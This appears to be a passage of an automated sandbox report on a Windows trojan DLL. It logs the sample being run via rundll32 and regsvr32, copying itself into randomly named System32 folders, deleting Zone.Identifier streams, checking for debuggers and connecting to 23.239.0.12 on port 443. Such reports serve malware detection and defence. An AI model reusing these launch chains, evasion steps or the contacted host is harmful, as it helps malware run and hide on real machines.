                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C9646_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C5686_2_000000018001C568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001D686_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001496C6_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002D706_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800245746_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800021786_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024D806_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800185986_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800035986_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F1A46_2_000000018001F1A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A9A86_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800119A86_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025DAC6_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018DAC6_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800269B06_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800059B86_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800029BC6_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800141C06_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800125C46_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800121CC6_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BDD06_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800075D46_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800095DC6_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F9E86_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800026106_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800196186_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FA386_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A2706_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019E786_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DA806_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800246986_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800176B86_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001AAB86_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002CAD06_2_000000018002CAD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180011AD06_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008AD86_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800296EC6_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A6EC6_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800193006_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001BB046_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002870C6_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000131C6_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000671C6_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029B286_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012F286_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BB286_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001EB306_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800203346_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800107586_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001435C6_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180009F5C6_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800293686_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800207686_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800173786_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800137806_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800153886_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: TSvDnT6fkE.dllVirustotal: Detection: 33%
                      Source: TSvDnT6fkE.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\TSvDnT6fkE.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllUnregisterServer
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ErRMcfUGTVTj\myfGzaHssmULBwf.dll"
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6416 -s 316
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\TSvDnT6fkE.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllUnregisterServerJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ErRMcfUGTVTj\myfGzaHssmULBwf.dll"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D3E.tmpJump to behavior
                      Source: classification engineClassification label: mal80.troj.evad.winDLL@28/10@0/2
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A8 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,6_2_00000001800046A8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2612:120:WilError_01
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6416
                      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: TSvDnT6fkE.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: TSvDnT6fkE.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: rundll32.exe, 00000005.00000000.288227813.00000064947A6000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.306608611.00000064947A6000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.789915273.00000000008E5000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: rundll32.exe, 00000005.00000000.288227813.00000064947A6000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.306608611.00000064947A6000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.789915273.00000000008E5000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AFFD push ebp; retf 2_2_000000018001AFFE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800051D1 push ebp; iretd 2_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BA32 push ebp; retf 2_2_000000018001BA33
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004E83 push es; ret 2_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B694 push es; ret 2_2_000000018001B6E9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BADD push ebp; iretd 2_2_000000018001BADE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B717 push ebp; iretd 2_2_000000018001B718
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AF4E push ebp; retf 2_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AFFD push ebp; retf 3_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800051D1 push ebp; iretd 3_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BA32 push ebp; retf 3_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180004E83 push es; ret 3_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B694 push es; ret 3_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BADD push ebp; iretd 3_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B717 push ebp; iretd 3_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180007B3F push esp; retf 3_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AF4E push ebp; retf 3_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AFFD push ebp; retf 4_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800051D1 push ebp; iretd 4_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BA32 push ebp; retf 4_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004E83 push es; ret 4_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B694 push es; ret 4_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BADD push ebp; iretd 4_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B717 push ebp; iretd 4_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180007B3F push esp; retf 4_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AF4E push ebp; retf 4_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800051D1 push ebp; iretd 6_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004E83 push es; ret 6_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007B3F push esp; retf 6_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC67207BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFC67207BE8
                      Source: TSvDnT6fkE.dllStatic PE information: real checksum: 0x85ab6 should be: 0x94f48
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\TSvDnT6fkE.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\ErRMcfUGTVTj\myfGzaHssmULBwf.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\ErRMcfUGTVTj\myfGzaHssmULBwf.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\MHPHu\UhqwmMGSX.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\ZCoVLNR\CxZC.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 5508Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 872Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4812Thread sleep time: -90000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-10019
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-10021
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 00000012.00000002.671739866.000001CF09061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                      Source: regsvr32.exe, 00000006.00000003.350257586.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.350348788.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.790154873.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.790511070.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.671329666.000001CF03829000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.671729861.000001CF09054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.573319043.00000256D7680000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.583956411.00000256D76EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.583644187.00000256D7680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000009.00000002.790131416.0000020423A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000009.00000002.790561095.0000020423A3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.790418238.000001A81446A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.790307864.000001D34F624000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC672020E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFC672020E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC67207BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFC67207BE8
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720D318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFC6720D318
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC672020E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFC672020E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC67206550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFC67206550

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFC6720C39C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,2_2_00007FFC6720DF98
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFC6720C7F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFC6720C834
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_00007FFC6720C450
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFC6720C2B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFC6720C6E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFC6720DF20
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFC6720DF3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFC6720E1E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFC6720C8C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,2_2_00007FFC6720C934
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_00007FFC6720C16C
